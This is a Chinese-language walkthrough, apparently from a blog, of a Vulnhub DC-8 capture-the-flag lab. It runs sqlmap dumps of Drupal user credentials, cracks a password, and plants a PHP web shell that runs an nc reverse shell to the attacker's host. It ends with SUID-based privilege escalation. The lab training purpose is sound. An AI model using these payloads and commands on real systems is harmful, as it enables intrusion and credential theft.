基于Vulnhub—DC8靶场渗透测试过程

简介: 这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码

0x00 靶场环境搭建

DC8下载链接

下载完成之后导入vmware或者virtualBox,网卡改为nat模式或仅主机模式(方便信息收集)

0x01 信息收集

arp-scan -l 扫描同号段发现靶机IP地址,直接nmap走起发现靶机开了80、22端口

尝试爆破了22端口,结果没用,但是在80端口web页面有一个cms,发现是一个Drupal的一个cms但是并没有发现相关的cms爆出的洞,于是我们随意点击一些链接发现存在报错注入

0x02靶场渗透

那么直接使用sqlmap一把梭试试,成功跑出两个用户名密码

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch --dbs

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch -D 'd7db' --tables

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch -D 'd7db' -T users --columns

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch -D 'd7db' -T users -C name,pass --dump

使用john破译出一个明文密码:turtle,使用御剑扫描出robots.txt,并发现后台管理员登录的地址,使用john用户名与爆破出的密码成功登录后台

于是寻找上传点,Contact Us->Webform->Form settings

<?php system("nc -e /bin/bash 192.168.94.207 4444");?>

点击保存

Kali linux开启监听,并回到Contact us填写内容进行提交并处罚反弹shell木马返回至kali当中

使用python创建一个伪终端(PTY)并执行交互式的 Bash shell

python -c 'import pty;pty.spawn("/bin/bash")'

0x03权限提升

尝试查找suid文件来进行提权

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -print 2>/dev/null

这两个命令都是用于在 Linux 系统中查找具有 SUID 权限设置的文件。它们的作用是相同的,只是使用了不同的方式来查询。

第一个命令 find / -perm -u=s -type f 2>/dev/null 使用 -perm -u=s 来查找具有 SUID 权限设置的文件,而第二个命令 find / -user root -perm -4000 -print 2>/dev/null 使用 -user root -perm -4000 来查找属主为 root 并且具有 SUID 权限设置的文件。

在这两个命令中,-perm -u=s-perm -4000 都表示查找具有 SUID 权限设置的文件,-type f 用于限定搜索结果为普通文件,-user root 用于匹配属主为 root 的文件。

2>/dev/null 是将标准错误输出重定向到 /dev/null,这样可以隐藏权限不足等错误信息,让输出更清晰。

找到一个exim4的程序,于是查看exim4的具体版本号,则为exim4.89,返回kali中搜索对应的提权程序

接着进入改目录并使用Python搭建一个简单的web服务,然后下载至靶机当中进行提权。

在此目录我们发现没有权限下载,那么我们进入tmp目录进行下载

在Linux系统中,/tmp目录通常用于存储临时文件。这个目录通常被用于存放程序在运行过程中产生的临时文件,例如临时的缓存文件、临时的交换文件等。这些文件在系统重启时会被删除,因此不适合用来存放重要数据。

/tmp目录对所有用户都是可写的,这意味着任何用户都可以在这个目录下创建、编辑和删除文件。由于/tmp目录是共享的,所以需要注意确保在该目录下创建的临时文件不会影响其他用户或系统运行。

于是我们直接赋予777权限,并运行此提权程序

成功提权并找到flag值!

目录
相关文章
|
2月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
32 4
|
2月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
40 4
|
3月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
46 0
|
3月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
45 0
|
7月前
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
|
7月前
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA  AC/DC电源模块的可靠性设计与测试方法
|
7月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
181 0
|
7月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
140 0
|
1月前
|
JSON Java 测试技术
SpringCloud2023实战之接口服务测试工具SpringBootTest
SpringBootTest同时集成了JUnit Jupiter、AssertJ、Hamcrest测试辅助库,使得更容易编写但愿测试代码。
59 3
|
2月前
|
JSON 算法 数据可视化
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
这篇文章是关于如何通过算法接口返回的目标检测结果来计算性能指标的笔记。它涵盖了任务描述、指标分析(包括TP、FP、FN、TN、精准率和召回率),接口处理,数据集处理,以及如何使用实用工具进行文件操作和数据可视化。文章还提供了一些Python代码示例,用于处理图像文件、转换数据格式以及计算目标检测的性能指标。
73 0
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)